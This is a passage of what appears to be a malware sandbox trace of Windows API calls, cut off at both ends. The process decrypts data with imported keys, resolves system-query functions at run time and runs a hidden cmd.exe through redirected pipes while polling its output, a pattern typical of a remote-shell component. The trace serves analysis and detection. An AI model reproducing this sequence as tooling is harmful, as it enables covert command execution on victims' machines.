dwFlags=0x0, pbData=0x569940*, pdwDataLen=0x18feec*=0x75, dwBufLen=0x80 | out: pbData=0x569940*, pdwDataLen=0x18feec*=0x80) returned 1 [0052.357] CryptDestroyKey (hKey=0x5699c8) returned 1 [0052.357] CryptImportKey (in: hProv=0x564928, pbData=0x5651b8, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x0, phKey=0x18fee8 | out: phKey=0x18fee8*=0x5699c8) returned 1 [0052.357] CryptEncrypt (in: hKey=0x5699c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56c928*, pdwDataLen=0x18feec*=0x75, dwBufLen=0x80 | out: pbData=0x56c928*, pdwDataLen=0x18feec*=0x80) returned 1 [0052.358] CryptDestroyKey (hKey=0x5699c8) returned 1 [0052.358] GetProcessHeap () returned 0x550000 [0052.358] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x567fb8 | out: hHeap=0x550000) returned 1 [0052.358] GetProcessHeap () returned 0x550000 [0052.358] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xa0) returned 0x569b50 [0052.358] CryptImportKey (in: hProv=0x564928, pbData=0x18fe90, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5699c8) returned 1 [0052.358] CryptDecrypt (in: hKey=0x5699c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x569b50, pdwDataLen=0x18fef8 | out: pbData=0x569b50, pdwDataLen=0x18fef8) returned 1 [0052.358] CryptDestroyKey (hKey=0x5699c8) returned 1 [0052.358] GetProcessHeap () returned 0x550000 [0052.358] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1c) returned 0x567fb8 [0052.358] GetProcessHeap () returned 0x550000 [0052.358] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xa) returned 0x565fa8 [0052.358] GetProcessHeap () returned 0x550000 [0052.358] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xe) returned 0x565f90 [0052.358] GetProcessHeap () returned 0x550000 [0052.358] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x19) returned 0x568148 [0052.358] GetProcessHeap () returned 0x550000 [0052.358] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xe) returned 0x565e88 [0052.358] GetProcessHeap () returned 0x550000 [0052.358] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xd) returned 0x565f48 [0052.358] GetProcessHeap () returned 0x550000 [0052.358] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1a) returned 0x568030 [0052.358] GetProcessHeap () returned 0x550000 [0052.358] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1b) returned 0x568008 [0052.359] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0052.359] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryObject") returned 0x77c5f9e8 [0052.359] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0052.359] GetProcAddress (hModule=0x77c40000, lpProcName="NtQuerySystemInformation") returned 0x77c5fda0 [0052.359] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0052.359] GetProcAddress (hModule=0x77c40000, lpProcName="RtlGetVersion") returned 0x77c7873a [0052.359] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x76d30000 [0052.359] GetProcAddress (hModule=0x76d30000, lpProcName="GetFinalPathNameByHandleW") returned 0x76d60a25 [0052.360] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x76d30000 [0052.360] GetProcAddress (hModule=0x76d30000, lpProcName="QueryFullProcessImageNameW") returned 0x76d515f7 [0052.360] GetProcessHeap () returned 0x550000 [0052.360] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569b50 | out: hHeap=0x550000) returned 1 [0052.360] GetProcessHeap () returned 0x550000 [0052.360] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565fa8 | out: hHeap=0x550000) returned 1 [0052.360] GetProcessHeap () returned 0x550000 [0052.360] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565f90 | out: hHeap=0x550000) returned 1 [0052.360] GetProcessHeap () returned 0x550000 [0052.360] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568148 | out: hHeap=0x550000) returned 1 [0052.360] GetProcessHeap () returned 0x550000 [0052.360] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565e88 | out: hHeap=0x550000) returned 1 [0052.360] GetProcessHeap () returned 0x550000 [0052.360] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565f48 | out: hHeap=0x550000) returned 1 [0052.360] GetProcessHeap () returned 0x550000 [0052.360] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568030 | out: hHeap=0x550000) returned 1 [0052.360] GetProcessHeap () returned 0x550000 [0052.360] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568008 | out: hHeap=0x550000) returned 1 [0052.360] GetProcessHeap () returned 0x550000 [0052.360] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x567fb8 | out: hHeap=0x550000) returned 1 [0052.360] GetProcessHeap () returned 0x550000 [0052.360] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1000) returned 0x56e260 [0052.360] NtQueryObject (in: Handle=0x0, ObjectInformationClass=0x3, ObjectInformation=0x56e260, ObjectInformationLength=0x1000, ReturnLength=0x18fedc | out: ObjectInformation=0x56e260, ReturnLength=0x18fedc) returned 0xc0000004 [0052.361] GetProcessHeap () returned 0x550000 [0052.361] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56e260 | out: hHeap=0x550000) returned 1 [0052.361] GetProcessHeap () returned 0x550000 [0052.361] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2000) returned 0x56e260 [0052.361] NtQueryObject (in: Handle=0x0, ObjectInformationClass=0x3, ObjectInformation=0x56e260, ObjectInformationLength=0x2000, ReturnLength=0x18fedc | out: ObjectInformation=0x56e260, ReturnLength=0x18fedc) returned 0x0 [0052.361] RtlGetVersion (in: lpVersionInformation=0x18fdc8 | out: lpVersionInformation=0x18fdc8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0052.361] GetProcessHeap () returned 0x550000 [0052.361] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56e260 | out: hHeap=0x550000) returned 1 [0052.361] GetVersion () returned 0x1db10106 [0052.361] GetCurrentProcess () returned 0xffffffff [0052.361] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x18ff00 | out: TokenHandle=0x18ff00*=0xa4) returned 1 [0052.361] GetTokenInformation (in: TokenHandle=0xa4, TokenInformationClass=0x18, TokenInformation=0x18ff04, TokenInformationLength=0x4, ReturnLength=0x18ff08 | out: TokenInformation=0x18ff04, ReturnLength=0x18ff08) returned 1 [0052.361] CloseHandle (hObject=0xa4) returned 1 [0052.361] Wow64DisableWow64FsRedirection (in: OldValue=0x18ff24 | out: OldValue=0x18ff24*=0x0) returned 1 [0052.361] GetProcessHeap () returned 0x550000 [0052.361] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x60) returned 0x569b50 [0052.361] CryptImportKey (in: hProv=0x564928, pbData=0x18feb8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5699c8) returned 1 [0052.361] CryptDecrypt (in: hKey=0x5699c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x569b50, pdwDataLen=0x18ff34 | out: pbData=0x569b50, pdwDataLen=0x18ff34) returned 1 [0052.362] CryptDestroyKey (hKey=0x5699c8) returned 1 [0052.362] GetProcessHeap () returned 0x550000 [0052.362] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x567fb8 [0052.362] CryptImportKey (in: hProv=0x564928, pbData=0x18f808, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x5647b4 | out: phKey=0x5647b4*=0x5699c8) returned 1 [0052.362] CryptDecrypt (in: hKey=0x5699c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x567fb8, pdwDataLen=0x18f8b4 | out: pbData=0x567fb8, pdwDataLen=0x18f8b4) returned 1 [0052.362] CryptDestroyKey (hKey=0x5699c8) returned 1 [0052.362] GetEnvironmentVariableW (in: lpName="ComSpec", lpBuffer=0x18f900, nSize=0x104 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0052.362] CreatePipe (in: hReadPipe=0x18f880, hWritePipe=0x18f878, lpPipeAttributes=0x18f8a8, nSize=0x0 | out: hReadPipe=0x18f880*=0xa4, hWritePipe=0x18f878*=0xac) returned 1 [0052.362] CreatePipe (in: hReadPipe=0x18f874, hWritePipe=0x18f884, lpPipeAttributes=0x18f8a8, nSize=0x0 | out: hReadPipe=0x18f874*=0xb0, hWritePipe=0x18f884*=0x10c) returned 1 [0052.362] SetHandleInformation (hObject=0xac, dwMask=0x1, dwFlags=0x0) returned 1 [0052.362] SetHandleInformation (hObject=0xb0, dwMask=0x1, dwFlags=0x0) returned 1 [0052.362] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f8b8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xa4, hStdOutput=0x10c, hStdError=0x10c), lpProcessInformation=0x18f894 | out: lpCommandLine=0x0, lpProcessInformation=0x18f894*(hProcess=0x114, hThread=0x110, dwProcessId=0x1c4, dwThreadId=0x5f4)) returned 1 [0052.523] WriteFile (in: hFile=0xac, lpBuffer=0x569b50*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x18f8a4, lpOverlapped=0x0 | out: lpBuffer=0x569b50*, lpNumberOfBytesWritten=0x18f8a4*=0x5f, lpOverlapped=0x0) returned 1 [0052.523] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0053.110] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0053.110] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0053.128] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0053.128] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0053.159] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0053.159] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0053.190] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0053.190] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0056.005] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0056.006] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0056.042] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0056.042] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0056.072] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0056.073] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0056.695] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0056.695] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0057.060] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0057.061] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0057.110] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x8f, lpBytesLeftThisMessage=0x0) returned 1 [0057.110] ReadFile (in: hFile=0xb0, lpBuffer=0x18fb08, nNumberOfBytesToRead=0x8f, lpNumberOfBytesRead=0x18f88c, lpOverlapped=0x0 | out: lpBuffer=0x18fb08*, lpNumberOfBytesRead=0x18f88c*=0x8f, lpOverlapped=0x0) returned 1 [0057.110] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0057.139] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x24, lpBytesLeftThisMessage=0x0) returned 1 [0057.139] ReadFile (in: hFile=0xb0, lpBuffer=0x18fb08, nNumberOfBytesToRead=0x24, lpNumberOfBytesRead=0x18f88c, lpOverlapped=0x0 | out: lpBuffer=0x18fb08*, lpNumberOfBytesRead=0x18f88c*=0x24, lpOverlapped=0x0) returned 1 [0057.139] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0057.727] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0057.728] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0058.206] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0058.206] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0058.250] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0058.250] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0059.586] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0059.586] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0059.659] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0059.660] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0060.020] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0060.020] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0060.057] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0060.057] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0060.117] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x77, lpBytesLeftThisMessage=0x0) returned 1 [0060.117] ReadFile (in: hFile=0xb0, lpBuffer=0x18fb08, nNumberOfBytesToRead=0x77, lpNumberOfBytesRead=0x18f88c, lpOverlapped=0x0 | out: lpBuffer=0x18fb08*, lpNumberOfBytesRead=0x18f88c*=0x77, lpOverlapped=0x0) returned 1 [0060.117] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0060.158] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0060.159] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0060.429] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0060.429] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0060.468] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0060.468] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0060.491] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0060.491] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0060.522] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0060.522] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0060.588] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0060.596] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0060.739] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0060.739] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0060.761] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0060.761] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0060.805] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0060.805] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0061.040] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0061.041] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0061.087] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0061.087] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0061.131] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0061.131] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0061.166] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0061.167] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0061.323] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0061.323] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0061.630] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0061.630] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0061.719] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0061.720] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0061.750] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0061.750] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0062.184] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0062.185] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0062.352] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0062.352] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0062.494] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0062.494] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0062.570] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0062.571] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0062.623] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0062.623] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0062.692] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0062.692] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 